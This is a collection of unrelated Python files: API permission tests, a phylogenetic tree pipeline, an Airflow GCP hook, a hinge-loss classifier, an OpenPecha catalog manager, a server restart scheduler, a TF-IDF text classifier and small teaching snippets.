        self.headers = HTTPHeaders({'auth-token': response_json['auth-token']})
        # A non-admin token must be rejected with 403.
        response = self.fetch('/v1/admin/delete_user', method="POST",
                              body=urlencode({'email': registry_new_user['email']}), headers=self.headers)
        response_json = json.loads(response.body)
        self.assertEqual(response.code, 403)
        self.assertEqual(response_json['type'], 'access_denied')
|
__author__ = 'AmmiNi'
import unittest
import TwitterMessenger
import FacebookMessenger
class TestSNS(unittest.TestCase):
    """Smoke tests: posting a message via each messenger must not raise."""

    def test_twitter(self):
        twitter_client = TwitterMessenger.TwitterMessenger()
        raised = False
        try:
            twitter_client.tweet("test message2")
        except Exception:  # narrowed from a bare except
            raised = True
        self.assertEqual(raised, False)
        # BUG FIX: removed `self.assertRaises(Exception, twitter_client.tweet("test message2"))`.
        # That line called tweet() immediately and passed its RETURN VALUE to
        # assertRaises (misusing the API), and it also contradicted the
        # no-exception assertion directly above.

    def test_facebook(self):
        facebook_client = FacebookMessenger.FacebookMessenger()
        raised = False
        try:
            facebook_client.post_message("test message2")
        except Exception:  # narrowed from a bare except
            raised = True
        self.assertEqual(raised, False)
if __name__ == '__main__':
    # Run the test case when executed directly.
    unittest.main() |
import re
# Split the sentence into words and record, per word, any match of 'á' or 'a'
# immediately followed by 's' or 'z'.
txt = """Tomás alias San Nicolas fue Capaz de ir con el Capataz
haciendolo andar de altas
"""
parrafo = txt.split()
# Hoisted out of the loop: compile the pattern once (raw string, same groups).
patron = re.compile(r"(á|a)(s|z)")
for palabra in parrafo:
    coincidencia = patron.findall(palabra)
    # Print words that contained the pattern.
    if coincidencia:
        print(palabra) |
# Structure of the arguments: python3 pipeline.py data_folder genes_list
import subprocess
import glob
import os
import ntpath
import statistics
from Bio import SeqIO
from Bio import AlignIO
############################################################################################################################################
def BuildingTrees(myInputBT):
    """Align, trim and build a bootstrapped RAxML tree for one protein fasta file.

    Pipeline: mafft (align) -> trimal (trim) -> raxml (bootstrap tree) ->
    raxml (tree certainty). Also writes a short summary to `myInputBT + '.result'`.

    :param myInputBT: path to a protein fasta file.
    :return: (stdev, trimmed_length, tree_certainty, identity) where
             tree_certainty is the relative TC parsed from RAxML_info.TC
             (None when the expected line is absent) and identity is the
             fraction of fully conserved alignment columns.
    """
    aligned_tmp_file = "/tmp/Aligned.fasta"
    trimmed_tmp_file = "/tmp/Trimmed.fasta"
    # Standard deviation of the raw (unaligned) sequence lengths.
    list_sd = [len(rec) for rec in SeqIO.parse(myInputBT, 'fasta')]
    stdev = statistics.stdev(list_sd)
    # 1. Alignment
    cmd = ['mafft', '--maxiterate', '1000', '--globalpair', myInputBT]
    with open(aligned_tmp_file, 'w+') as f:
        p1 = subprocess.Popen(cmd, stdout=f,
                              stderr=subprocess.DEVNULL)
        p1.communicate()
    # 2. Trimming
    cmd = ['trimal', '-automated1', '-in', aligned_tmp_file]
    with open(trimmed_tmp_file, 'w+') as f:
        p2 = subprocess.Popen(cmd, stdout=f)
        p2.communicate()
    # Trimmed alignment length
    alignment = AlignIO.read(trimmed_tmp_file, 'fasta')
    trimmed_length = alignment.get_alignment_length()
    # Identity: fraction of columns where every species has the same residue.
    identity_count = 0
    for i in range(trimmed_length):
        column = {str(species.seq[i]) for species in alignment}
        if len(column) == 1:
            identity_count += 1
    identity = identity_count / trimmed_length
    # 3. Tree construction; for multithreading add '-T', '8'
    cmd = ['raxml', '-p', '12345', '-m', 'PROTGAMMAWAG', '-#', '100', '-s', trimmed_tmp_file, '-f', 'a', '-x', '12345',
           '-n', ntpath.basename(myInputBT), '-o', 'Drosophila_melanogaster']
    p3 = subprocess.Popen(cmd)
    p3.communicate()
    # 4. Tree certainty; for multithreading add '-T', '8'
    cmd = ['raxml', '-b', '12345', '-m', 'PROTGAMMAWAG', '-#', '100', '-f', 'i',
           '-n', 'TC', '-z', 'RAxML_bootstrap.' + ntpath.basename(myInputBT), '-t', 'RAxML_BestTree.' + ntpath.basename(myInputBT), '-L', 'MR']
    p4 = subprocess.Popen(cmd)
    p4.communicate()
    # 5. Parse TC file and extract relative tree certainty
    # BUG FIX: tree_certainty was previously unbound (NameError at return) when
    # the expected line was missing; default to None instead.
    tree_certainty = None
    with open("RAxML_info.TC") as tc_file:
        for line in tc_file:
            if line.startswith("Relative tree certainty for this tree:"):
                tree_certainty = line.split(" ")[-1]
    # 6. Output (context manager guarantees the file is closed even on error)
    with open(myInputBT + '.result', 'w') as file_r:
        file_r.write("Standard deviation of protein length: ")
        file_r.write(str(stdev))
        file_r.write("\n")
        file_r.write("Trimmed alignment length: ")
        file_r.write(str(trimmed_length))
    os.remove(aligned_tmp_file)
    os.remove(trimmed_tmp_file)
    return (stdev, trimmed_length, tree_certainty, identity)
############################################################################################################################################
def raw_cur_finder(folder):
    """Locate the RAW and CUR fasta files for a gene folder.

    :param folder: gene folder name (relative to the current directory).
    :return: (raw_paths, raw_found, cur_paths, cur_found) where the *_paths
             entries are the glob result lists and the flags say whether the
             first match exists on disk.
    """
    # BUG FIX: the original used a bare `except:` around an IndexError on an
    # empty glob result as control flow; test emptiness explicitly instead.
    raw_path = glob.glob(folder + os.path.sep + folder + "_RAW" + os.path.sep + folder + "-*RAW*.fasta")
    raw_found = bool(raw_path) and os.path.exists(raw_path[0])
    if not raw_found:
        print("Raw file not found!")
    cur_path = glob.glob(folder + os.path.sep + folder + "_CUR" + os.path.sep + folder + "-*CUR*.fasta")
    cur_found = bool(cur_path) and os.path.exists(cur_path[0])
    if not cur_found:
        print("Curated file not found!")
    return (raw_path, raw_found, cur_path, cur_found)
############################################################################################################################################
def main(in_folder, gene_list):
    """Run the tree pipeline for every gene and append metrics to metrics_out.txt.

    :param in_folder: data folder; the process chdirs into it.
    :param gene_list: iterable of gene folder names to process.
    """
    with open("metrics_out.txt", "w+") as metrics_out:
        metrics_out.write("gene" + "\t " + "file" + "\t " + "stdev" + "\t" + "trim_len" + "\t" + "relative_TC" + "\t" + "Identity" + "\n")
        print("Genes to process:", gene_list)
        os.chdir(in_folder)  # all subsequent paths are relative to the data folder
        for gene in gene_list:
            print(gene)
            raw_path, raw_found, cur_path, cur_found = raw_cur_finder(gene)
            # Only process genes where both the RAW and CUR files exist.
            if raw_found and cur_found:
                results_raw = BuildingTrees(raw_path[0])
                metrics_out.write(''.join([str(gene), "\traw\t", str(results_raw[0]), "\t", str(results_raw[1]), "\t", str(results_raw[2]), "\t", str(results_raw[3]), "\n"]))
                results_cur = BuildingTrees(cur_path[0])
                # BUG FIX: the curated row previously reported results_raw[3]
                # (the RAW identity) in its Identity column.
                metrics_out.write(''.join([str(gene), "\tcurated\t", str(results_cur[0]), "\t", str(results_cur[1]), "\t", str(results_cur[2]), "\t", str(results_cur[3]), "\n"]))
                print("Gene: ", gene, "processed!")
        # The redundant explicit close() was removed; the `with` block closes
        # the file exactly once.
import sys
# Structure of the arguments: python3 pipeline.py data_folder genes_list
args = sys.argv
data_folder = args[1]
gene_list = args[2]
# NOTE(review): gene_list is the raw argv STRING, so main() will iterate it
# character-by-character; most likely it should be split (e.g. on commas) or
# read from a file — confirm the intended genes_list format.
main(data_folder, gene_list)
|
from airflow.hooks import BaseHook
import gcloud
class GCPBaseHook(BaseHook):
    """
    A hook for working with Google Cloud Platform via the gcloud library.

    A GCP connection ID can be provided. If it is provided, its values
    will OVERRIDE any arguments passed to the hook. The following precedence is
    observed:
        GCP connection fields
        GCPBaseHook initialization arguments
        host environment

    Google Cloud Platform connections can be created from the Airflow UI. If
    created manually, the relevant (but optional) fields should be added to
    the connection's "extra" field as JSON:
        {
            "project": "<google cloud project id>",
            "key_path": "<path to service account keyfile, either JSON or P12>"
            "service_account": "<google service account email, required for P12>"
            "scope": "<google service scopes, comma separated>"
        }

    service_account is only required if the key_path points to a P12 file.
    scope is only used if key_path is provided. Scopes can include, for example:
        https://www.googleapis.com/auth/devstorage.full_control
        https://www.googleapis.com/auth/devstorage.read_only
        https://www.googleapis.com/auth/devstorage.read_write

    If fields are not provided, either as arguments or extras, they can be set
    in the host environment.

    To set a default project, use:
        gcloud config set project <project-id>
    To log in:
        gcloud auth
    """
    # Subclasses must set this to a gcloud client class (e.g. storage.Client).
    client_class = None
    def __init__(
            self,
            gcp_conn_id=None,
            project=None,
            key_path=None,
            service_account=None,
            scope=None,
            *args,
            **kwargs):
        if not self.client_class:
            raise NotImplementedError(
                'The GCPBaseHook must be extended by providing a client_class.')
        # compatibility with GoogleCloudStorageHook
        if 'google_cloud_storage_conn_id' in kwargs and not gcp_conn_id:
            gcp_conn_id = kwargs.pop('google_cloud_storage_conn_id')
        self.gcp_conn_id = gcp_conn_id
        self.project = project
        self.key_path = key_path
        self.service_account = service_account
        self.scope = scope
        # The client is built eagerly; failures surface at hook construction.
        self.client = self.get_conn()
    def get_conn(self):
        """Build and return the gcloud client using connection extras,
        constructor arguments, then host environment — in that precedence."""
        # parse arguments and connection extras
        if self.gcp_conn_id:
            extras = self.get_connection(self.gcp_conn_id).extra_dejson
        else:
            extras = {}
        def load_field(f, fallback=None):
            # Resolve a config value: UI-created extra field first, then plain
            # extra key, finally the constructor argument of the same name.
            # long_f: the format for UI-created fields
            long_f = 'extra__google_cloud_platform__{}'.format(f)
            if long_f in extras:
                return extras[long_f]
            elif f in extras:
                return extras[f]
            else:
                return getattr(self, fallback or f)
        project = load_field('project')
        key_path = load_field('key_path')
        service_account = load_field('service_account')
        scope = load_field('scope')
        if scope:
            # Scopes arrive as a comma-separated string; gcloud wants a list.
            scope = scope.split(',')
        # guess project, if possible
        if not project:
            project = gcloud._helpers._determine_default_project()
            # workaround for
            # https://github.com/GoogleCloudPlatform/gcloud-python/issues/1470
            if isinstance(project, bytes):
                project = project.decode()
        # load credentials/scope; the key file type decides the credential API
        if key_path:
            if key_path.endswith('.json') or key_path.endswith('.JSON'):
                credentials = gcloud.credentials.get_for_service_account_json(
                    json_credentials_path=key_path,
                    scope=scope)
            elif key_path.endswith('.p12') or key_path.endswith('.P12'):
                # P12 keyfiles additionally require the service account email.
                credentials = gcloud.credentials.get_for_service_account_p12(
                    client_email=service_account,
                    private_key_path=key_path,
                    scope=scope)
            else:
                raise ValueError('Unrecognized keyfile: {}'.format(key_path))
            client = self.client_class(
                credentials=credentials,
                project=project)
        else:
            # No key file: fall back to ambient (host environment) credentials.
            client = self.client_class(project=project)
        return client
|
from django.conf.urls import patterns, url
# NOTE(review): implicit relative import (Python 2 style); `patterns()` was
# removed in Django 1.10 -- this module targets an older Django/Python stack.
import views
urlpatterns = patterns(
    '',
    # guest creation page, handled by the class-based GuestAdd view
    url(r'^guest/add/$', views.GuestAdd.as_view(), name='guest_add'),
)
|
#!/usr/bin/env python
# Authors: Nicolas Pinto <nicolas.pinto@gmail.com>
# Nicolas Poilvert <nicolas.poilvert@gmail.com>
# License: BSD
"""
Square Hinge Binary Classifier
The code internally uses {-1, +1} for the target values, but outputs predictions
between 0 and 1.
Everything inferior or equal to 0 is mapped to -1 and the rest is mapped to +1.
This concerns only the "ground truth" of course.
The code has many features. In the "fit" method, one can choose to use
mini-batches instead of using the full batch. One can also use a starting value
for the weight vector and the bias in the "fit" method. This allows, e.g. to use
"warm restarts" in the AverageClassifier. Finally, the classifier can be
"biased" towards the positive or negative class by playing with one of the
attributes (here ``negfrac``).
"""
__all__ = ['LBFGSSqHingeClassifier', 'AverageLBFGSSqHingeClassifier']
import numpy as np
from scipy.optimize import fmin_l_bfgs_b
import theano
from theano import tensor as T
# magnitude used for the random initialization of weights and bias
EPS = 1e-3
# default options forwarded to scipy's fmin_l_bfgs_b
DEFAULT_LBFGS_PARAMS = dict(
    iprint=1,
    factr=1e7,
    maxfun=1e4,
    )
# default epsilon-insensitivity of the square hinge loss
DEFAULT_EPS_SENS = 0.1
class LBFGSSqHingeClassifier(object):
    """Epsilon-insensitive square hinge binary classifier trained with L-BFGS.

    Targets are mapped internally to {-1, +1} (anything <= 0 is negative);
    ``transform`` returns sigmoid-squashed scores in [0, 1] and ``predict``
    thresholds them at 0.5.  The loss can be biased towards one class via
    ``negfrac``.
    """

    def __init__(self,
                 n_features,
                 lbfgs_params=DEFAULT_LBFGS_PARAMS,
                 eps_sens=DEFAULT_EPS_SENS,
                 negfrac=None,
                 ):
        self.n_features = n_features
        self.lbfgs_params = lbfgs_params
        # weight vector and bias; filled in by fit()
        self.W = np.empty((n_features,), dtype=np.float32)
        self.b = np.empty((1), dtype=np.float32)
        # epsilon-insensitivity of the hinge
        self.eps_sens = eps_sens
        # fixed fraction of the loss given to the negative class
        # (None = use the empirical class ratio of each batch)
        self.negfrac = negfrac

    def fit(self, X, Y, w_start=None, b_start=None,
            mini_batch_size=10000, n_maxfun=20, bfgs_m=10):
        """
        fit X to Y using an epsilon-insensitive square hinge classifier.

        Parameters
        ----------
        ``X``: 2-dimensional array-like
            the input matrix of shape [n_samples, n_features]
        ``Y``: 1-dimensional array-like
            the output vector telling what is the class label for each feature
            vector in ``X`` (i.e. for each row of ``X``). shape [n_samples,]
        ``w_start``: 1-dimensional array-like
            starting weight vector of shape [n_features,]. If None the vector
            is initialized to a vector of length EPS in a random direction.
        ``b_start``: 1-dimensional vector
            starting bias vector of shape [1,]
        ``mini_batch_size``: integer
            size of the mini-batch, i.e. number of samples to use at one time
            in the optimization.
        ``n_maxfun``: integer
            number of authorized LBFGS iterations per mini-batch. The last
            mini-batch always goes to convergence, so that limit does not
            apply to that last mini-batch.
        ``bfgs_m``: integer
            number of dimensions in the Hessian estimation.
        """
        assert X.ndim == 2
        assert Y.ndim == 1
        assert len(X) == len(Y)
        assert X.shape[1] == self.n_features
        dtype = X.dtype

        # -- transform Y_true from R to {-1, 1}
        Y_true = Y.ravel().astype(np.int32)
        Y_true = np.where(Y_true <= 0, -1, 1)

        # -- initialize weights and bias.  Bug fix: the original tested
        # `w_start == None`, which on a numpy array is an element-wise
        # comparison whose truth value raises ValueError; `is None` is the
        # correct identity test (the four-way branch collapses to two).
        if w_start is None:
            # random direction of length EPS
            w = np.random.uniform(low=-EPS, high=EPS,
                                  size=X.shape[1]).astype(dtype)
            w /= np.linalg.norm(w)
            w *= EPS
        else:
            w_start = np.array(w_start)
            assert w_start.ndim == 1
            assert w_start.size == X.shape[1]
            w = w_start.astype(dtype)
        if b_start is None:
            b = np.random.uniform(low=-EPS, high=EPS, size=1).astype(dtype)
        else:
            b_start = np.array(b_start)
            assert b_start.ndim == 1
            assert b_start.size == 1
            b = b_start.astype(dtype)

        # -- initial variables
        w_size = w.size
        m_sens = self.eps_sens

        # -- theano program: class-balanced square hinge on squashed margins
        t_X = T.fmatrix()
        t_y = T.fvector()
        t_w = T.fvector()
        t_b = T.fscalar()
        t_H = T.dot(t_X, t_w) + t_b
        t_H = 2. * T.nnet.sigmoid(t_H) - 1   # scores squashed into (-1, 1)
        t_M = t_y * t_H                      # per-sample margins
        # -- here we compute key values for "balancing" the classifier
        t_y_true = (t_y + 1) / 2
        t_npos = T.sum(t_y_true)
        t_nneg = T.sum(1 - t_y_true)
        t_npos_inv = 1 / t_npos
        t_nneg_inv = 1 / t_nneg
        if self.negfrac is None:
            t_frac = t_nneg / (t_npos + t_nneg)
        else:
            t_frac = float(self.negfrac)
        t_loss_pos = t_npos_inv * T.sum(t_y_true * \
                (T.maximum(0, 1 - t_M - m_sens) ** 2.))
        t_loss_neg = t_nneg_inv * T.sum((1 - t_y_true) * \
                (T.maximum(0, 1 - t_M - m_sens) ** 2.))
        t_loss = (1 - t_frac) * t_loss_pos + t_frac * t_loss_neg
        t_dloss_dw = T.grad(t_loss, t_w)
        t_dloss_db = T.grad(t_loss, t_b)

        # -- compiling theano functions
        _f = theano.function(
            [t_X, t_w, t_b],
            t_H,
            allow_input_downcast=True)
        _f_df = theano.function(
            [t_X, t_y, t_w, t_b],
            [t_H, t_loss, t_dloss_dw, t_dloss_db],
            allow_input_downcast=True)

        # -- how many mini-batches fit in X
        n_mini_batch = int(X.shape[0] / mini_batch_size)
        if n_mini_batch <= 1:
            mini_batch_size = X.shape[0]
            n_mini_batch = 1

        # -- compute indices for mini-batch feature vectors (random partition)
        ref_idx = np.random.permutation(X.shape[0])
        # bug fix: `range` instead of Python-2-only `xrange`
        mini_batch_indices = [
            ref_idx[i * mini_batch_size:(i + 1) * mini_batch_size]
            for i in range(n_mini_batch)]

        def minimize_me(vars, X_trn, Y_true_trn):
            """Loss/gradient callback for fmin_l_bfgs_b over packed [w, b]."""
            # -- unpack W and b
            w_in = vars[:w_size]
            b_in = vars[w_size:]
            # -- get loss and gradients from theano function
            Y_pred, loss, dloss_w, dloss_b = _f_df(X_trn, Y_true_trn,
                                                   w_in, b_in[0])
            # -- pack dW and db
            dloss = np.concatenate([dloss_w.ravel(), dloss_b.ravel()])
            # -- fmin_l_bfgs_b needs double precision...
            return loss.astype(np.float64), dloss.astype(np.float64)

        # -- mini-batch L-BFGS iterations
        w_av = w.copy()
        b_av = b.copy()
        n_iter = 1.
        if len(mini_batch_indices) > 1:
            # -- mini-batch updates for the weights and bias
            for idx in mini_batch_indices[:-1]:
                X_mb = np.ascontiguousarray(X[idx])
                Y_true_mb = np.ascontiguousarray(Y_true[idx])
                vars = np.concatenate([w.ravel(), b.ravel()])
                best, bestval, info = fmin_l_bfgs_b(minimize_me, vars,
                                                    args=[X_mb, Y_true_mb],
                                                    factr=1e7, maxfun=n_maxfun,
                                                    iprint=1, m=bfgs_m)
                w = best[:w_size]
                b = best[w_size:]
                # running average of the per-batch solutions
                alpha = 1. / (n_iter + 1.)
                w_av = (1. - alpha) * w_av + alpha * w
                b_av = (1. - alpha) * b_av + alpha * b
            # -- last mini-batch is converged, warm-started from the average
            X_mb = np.ascontiguousarray(X[mini_batch_indices[-1]])
            Y_true_mb = np.ascontiguousarray(Y_true[mini_batch_indices[-1]])
            vars = np.concatenate([w_av.ravel(), b_av.ravel()])
            best, bestval, info = fmin_l_bfgs_b(minimize_me, vars,
                                                args=[X_mb, Y_true_mb],
                                                factr=1e7, maxfun=15000,
                                                iprint=1, m=bfgs_m)
        else:
            # -- if only one mini-batch exists we converge it
            X_mb = np.ascontiguousarray(X[mini_batch_indices[0]])
            Y_true_mb = np.ascontiguousarray(Y_true[mini_batch_indices[0]])
            vars = np.concatenate([w.ravel(), b.ravel()])
            best, bestval, info = fmin_l_bfgs_b(minimize_me, vars,
                                                args=[X_mb, Y_true_mb],
                                                factr=1e7, maxfun=15000,
                                                iprint=1, m=bfgs_m)
        # -- bug fix: adopt the final converged solution.  Previously `best`
        # from the last fmin_l_bfgs_b call was discarded, so the stored W/b
        # were the pre-convergence (or, in the single-batch branch, the
        # initial random) values.
        w = best[:w_size]
        b = best[w_size:]
        self.W = w.astype(np.float32)
        self.b = b.astype(np.float32)
        self._f = _f
        return self

    def transform(self, X):
        """Return scores in [0, 1] for each row of X."""
        assert X.ndim == 2
        Y = self._f(X, self.W, self.b[0])
        # -- retransform Y from [-1, +1] to [0, 1]
        Y = 0.5 * (Y + 1.)
        return Y

    def predict(self, X):
        """Return boolean predictions (score > 0.5)."""
        Y_pred = self.transform(X) > 0.5
        return Y_pred
class AverageLBFGSSqHingeClassifier(object):
    """Running average of LBFGSSqHingeClassifier solutions across chunks.

    Each ``partial_fit`` warm-restarts the inner classifier from the previous
    chunk's solution and folds the result into an incremental mean (W, b),
    which is what ``transform``/``predict`` use.
    """

    def __init__(self,
                 n_features,
                 lbfgs_params=DEFAULT_LBFGS_PARAMS,
                 eps_sens=DEFAULT_EPS_SENS,
                 negfrac=None
                 ):
        self.n_features = n_features
        self.lbfgs_params = lbfgs_params
        # averaged solution, starts at zero before any chunk is seen
        self.W = np.zeros((n_features,), dtype=np.float32)
        self.b = np.zeros((1), dtype=np.float32)
        self.n_iter = 0
        # inner solver, re-used (warm-restarted) for every chunk
        self.clf = LBFGSSqHingeClassifier(n_features,
                                          lbfgs_params=lbfgs_params,
                                          eps_sens=eps_sens,
                                          negfrac=negfrac)
        # most recent per-chunk solution, used as the next warm start
        self.last_w = self.W.copy()
        self.last_b = self.b.copy()

    def partial_fit(self, X, Y, w_start=None, b_start=None,
                    mini_batch_size=10000, n_maxfun=20, bfgs_m=10):
        """Fit one chunk and fold its solution into the running average."""
        self.clf.fit(X, Y,
                     w_start=self.last_w.copy(),
                     b_start=self.last_b.copy(),
                     mini_batch_size=mini_batch_size,
                     n_maxfun=n_maxfun, bfgs_m=bfgs_m)
        self.n_iter += 1
        alpha = 1.0 / self.n_iter
        # incremental mean over all chunk solutions seen so far
        self.W = (1.0 - alpha) * self.W + alpha * self.clf.W
        self.b = (1.0 - alpha) * self.b + alpha * self.clf.b
        self.last_w = self.clf.W.copy()
        self.last_b = self.clf.b.copy()
        return self

    def transform(self, X):
        """Score rows of X with the *averaged* weights, mapped to [0, 1]."""
        assert X.ndim == 2
        raw = self.clf._f(X, self.W, self.b[0])
        return 0.5 * (raw + 1.)

    def predict(self, X):
        """Boolean predictions: averaged score above 0.5."""
        return self.transform(X) > 0.5
|
'''catalog module contains all the functionalities necessary for managing
the catalog. Functionalities include:
- Creating opfs from input text
- Assigning ID to the new opf
- Updating the catalog with new opfs
'''
import yaml
import requests
from openpecha.formatters import *
from openpecha.github_utils import create_file, create_readme
from openpecha.github_utils import github_publish
from openpecha.utils import *
# Default processing pipeline: 'input' and 'release' handlers, looked up by
# name in CatalogManager._process.
buildin_pipes = {
    'input': {
        'ocr_result_input': ocr_result_input
    },
    'release': {
        'create_release_with_assets': create_release_with_assets
    }
}
class CatalogManager:
    '''Manages the catalog: formats input into OPF pechas, assigns
    incremental IDs, publishes them to GitHub and updates the catalog repo.'''
    def __init__(self, pipes=None, formatter_type=None, not_include_files=['releases'], last_id_fn='last_id'):
        # NOTE(review): mutable default `not_include_files=['releases']` is
        # shared across instances; safe only if callers never mutate it.
        self.repo_name = "openpecha-catalog"
        self.batch_path = "data/batch.csv"
        self.last_id_path = f"data/{last_id_fn}"
        self.batch = []  # catalog rows accumulated until update_catalog()
        self.last_id = self._get_last_id()
        self.FormatterClass = self._get_formatter_class(formatter_type)
        self.not_include_files = not_include_files
        self.pipes = pipes if pipes else buildin_pipes
    def _get_formatter_class(self, formatter_type):
        '''Returns formatter class based on the formatter-type'''
        if formatter_type == 'ocr':
            return GoogleOCRFormatter
        elif formatter_type == 'tsadra':
            return TsadraFormatter
        # NOTE(review): falls through to None for unknown types, which makes
        # format_and_publish fail later with a TypeError.
    def _get_last_id(self):
        '''returns the id assigned to the last opf pecha'''
        # fetched from the raw GitHub view of the catalog repository
        last_id_url = f'https://raw.githubusercontent.com/OpenPecha/openpecha-catalog/master/{self.last_id_path}'
        r = requests.get(last_id_url)
        # the stored id carries a one-character prefix which is stripped
        # before the numeric conversion
        return int(r.content.decode('utf-8').strip()[1:])
    def _add_id_url(self, row):
        # turn the bare id in column 0 into a markdown link to its repo
        id = row[0]
        row[0] = f'[{id}](https://github.com/OpenPecha/{id})'
        return row
    def update_catalog(self):
        '''Updates the catalog csv to have new opf-pechas metadata'''
        # update last_id file in the catalog repo (id of the newest pecha)
        content = self.batch[-1][0].strip()
        create_file(self.repo_name, self.last_id_path, content, "update last id of Pecha", update=True)
        # update last_id held in memory
        self.last_id = int(content[1:])
        # create batch.csv (one markdown-linked row per new pecha)
        content = '\n'.join([','.join(row) for row in map(self._add_id_url, self.batch)]) + '\n'
        create_file(self.repo_name, self.batch_path, content, "create new batch")
        print('[INFO] Updated the OpenPecha catalog')
        # reset the batch
        self.batch = []
    def _get_catalog_metadata(self, pecha_path):
        '''Collect one catalog row from the pecha's meta.yml and create its README.'''
        meta_fn = pecha_path/f'{pecha_path.name}.opf/meta.yml'
        metadata = yaml.safe_load(meta_fn.open())
        catalog_metadata = [
            metadata['id'].split(':')[-1],
            metadata['source_metadata']['title'],
            metadata['source_metadata']['volume'],
            metadata['source_metadata']['author'],
            metadata['source_metadata']['id']
        ]
        self.batch.append(catalog_metadata)
        create_readme(metadata['source_metadata'], pecha_path)
    def format_and_publish(self, path):
        '''Convert input pecha to opf-pecha with id assigned'''
        formatter = self.FormatterClass()
        self.last_id += 1
        pecha_path = formatter.create_opf(path, self.last_id)
        self._get_catalog_metadata(pecha_path)
        github_publish(pecha_path, not_includes=self.not_include_files)
        return pecha_path
    def ocr_to_opf(self, path):
        '''Run the OCR input pipe, then format, publish and release.'''
        self._process(
            path,
            'ocr_result_input',
            'create_release_with_assets'
        )
    def _process(self, path, input_method, release_method):
        '''Generic pipeline: input pipe -> format/publish -> release pipe.'''
        print('[INFO] Getting input')
        raw_pecha_path = self.pipes['input'][input_method](path)
        print('[INFO] Convert Pecha to OPF')
        opf_pecha_path = self.format_and_publish(raw_pecha_path)
        print('[INFO] Release OPF pecha')
        self.pipes['release'][release_method](opf_pecha_path)
if __name__ == "__main__":
    # Example run: convert one Google-OCR'd pecha and update the catalog.
    catalog = CatalogManager(formatter_type='ocr', last_id_fn='ocr-machine-08_last_id')
    catalog.ocr_to_opf('./tests/data/formatter/google_ocr/W3CN472')
    catalog.update_catalog()
import subprocess
import sys
import time
import schedule
def start():
    """Bring the stack up: LDAP sync, backend server, then the Vue client."""
    # subprocess.Popen(['./ldap_starter.sh'], shell = True)
    # t = 10
    # time.sleep(t)
    # blocking call: wait for the LDAP import to finish before the server starts
    subprocess.call(['/home/george/anaconda3/bin/python3.8 ./ldap_con.py'], shell=True)
    # backend runs in the background
    subprocess.Popen(['/home/george/anaconda3/bin/python3.8 ./server_conn.py'], shell=True)
    # give the backend time to come up before launching the frontend
    time.sleep(300)
    subprocess.Popen(['./client/vue_run.sh'], shell=True)
    time.sleep(20)
    print("Web Server is up and running...")
def end():
    """Tear the stack down: kill the backend, free its ports, clean up."""
    script1 = './server_conn.py'
    script2 = './free_ports.sh'
    # kill every process whose command line matches the backend script
    subprocess.check_call(['pkill','-9','-f', script1])
    time.sleep(30)
    subprocess.Popen([script2], shell = True)
    time.sleep(30)
    subprocess.call(['./deleter.sh'], shell = True)
    time.sleep(30)
# Restart cycle: tear down just after midnight, bring back up ten minutes later.
schedule.every().day.at("00:00").do(end)
schedule.every().day.at("00:10").do(start)
while True:
    schedule.run_pending()
    # Bug fix: sleep between polls -- without it this loop busy-waits and
    # pins a CPU core; once per second is ample for minute-level schedules.
    time.sleep(1)
|
# Importing a whole module:
#import pizza
#pizza.make_pizza(15,"mushroom","orange","apple")
# Importing specific functions (the second import gives the function an alias):
from pizza import make_pizza,make_pizza as mp
make_pizza(12,"orange","strawberry","green paper")
mp(14,"mushroom")
|
import pandas as pd, numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
import time
t1=time.time()
# NOTE(review): the [:100]/[:10] slices keep only a tiny sample, presumably
# for quick experimentation; drop them for a full run.
train = pd.read_csv('input/train_set.csv')[:100]
test = pd.read_csv('input/test_set.csv')[:10]
test_id = pd.read_csv('input/test_set.csv')[["id"]][:10].copy()
column="word_seg"
# shape of the training data
n = train.shape
# convert the raw document collection into a TF-IDF feature matrix
vec = TfidfVectorizer(ngram_range=(1,2),min_df=3, max_df=0.9,use_idf=1,smooth_idf=1, sublinear_tf=1)
# this transformation step is fairly time-consuming
# NOTE(review): only the word_seg column is transformed -- confirm intent
trn_term_doc = vec.fit_transform(train[column])
# transform (not fit_transform): reuses the vocabulary fitted on the train set
test_term_doc = vec.transform(test[column])
y=(train["class"]-1).astype(int)
# create the logistic regression classifier
clf = LogisticRegression(C=4, dual=True)
clf.fit(trn_term_doc, y)
# get the predicted class probabilities
preds=clf.predict_proba(test_term_doc)
# save the probability file
# first convert the probabilities to a pandas DataFrame
test_prob=pd.DataFrame(preds)
# print(list(test_prob.columns))
# test_prob.columns is a RangeIndex (start=0, stop=n_classes, step=1)
test_prob.columns=["class_prob_%s"%i for i in range(1,preds.shape[1]+1)]
# print(test_prob.columns)
# the printed output is:
# Index(['class_prob_1', 'class_prob_2', 'class_prob_3', 'class_prob_4',
#        'class_prob_5', 'class_prob_6', 'class_prob_7', 'class_prob_8',
#        'class_prob_9', 'class_prob_10', 'class_prob_11', 'class_prob_12',
#        'class_prob_13', 'class_prob_14', 'class_prob_15', 'class_prob_16',
#        'class_prob_17', 'class_prob_18'],
#        dtype='object')
test_prob["id"]=list(test_id["id"])
# print(test_prob["id"])
test_prob.to_csv('input/prob_lr_baseline.csv',index=None)
#
# # generate the submission result (hard labels via argmax)
preds=np.argmax(preds,axis=1)
# [13 8 11 12 8 2 2 12 2 12]
print(preds)
test_pred=pd.DataFrame(preds)
print(test_pred)  # 0
test_pred.columns=["class"]
# shift back from the 0-based labels used for training to 1-based classes
test_pred["class"]=(test_pred["class"]+1).astype(int)
# print(test_pred["class"])
# 0     14
# 1      9
# 2     12
# 3     13
# 4      9
# 5      3
# 6      3
# 7     13
# 8      3
# 9     13
# prints the shape of the predictions
print(test_pred.shape)  # (10,1)
# prints the shape of all the ids
print(test_id.shape)  # (10,1) because of the [:10] slice above
test_pred["id"]=list(test_id["id"])
test_pred[["id","class"]].to_csv('input/sub_lr_baseline.csv',index=None)
t2=time.time()
print("time use:",t2-t1)
|
# -*- coding:utf-8 -*-
# Deep copy vs. shallow copy demonstration
import copy
list1 = [1,2,['a','b']]
list2 = list1                 # plain assignment: list2 IS list1 (same object)
list3 = copy.copy(list1)      # shallow copy: new outer list, nested list shared
list4 = copy.deepcopy(list1)  # deep copy: the nested list is duplicated too
list1.append(3)        # visible through list2 only (same object)
list1[2].append('c')   # visible through list2 AND list3 (shared inner list)
print('list1 = ',list1)
print('list2 = ',list2)
print('list3 = ',list3)
print('list4 = ',list4)
# result:
# list1 =  [1, 2, ['a', 'b', 'c'], 3]
# list2 =  [1, 2, ['a', 'b', 'c'], 3]
# list3 =  [1, 2, ['a', 'b', 'c']]
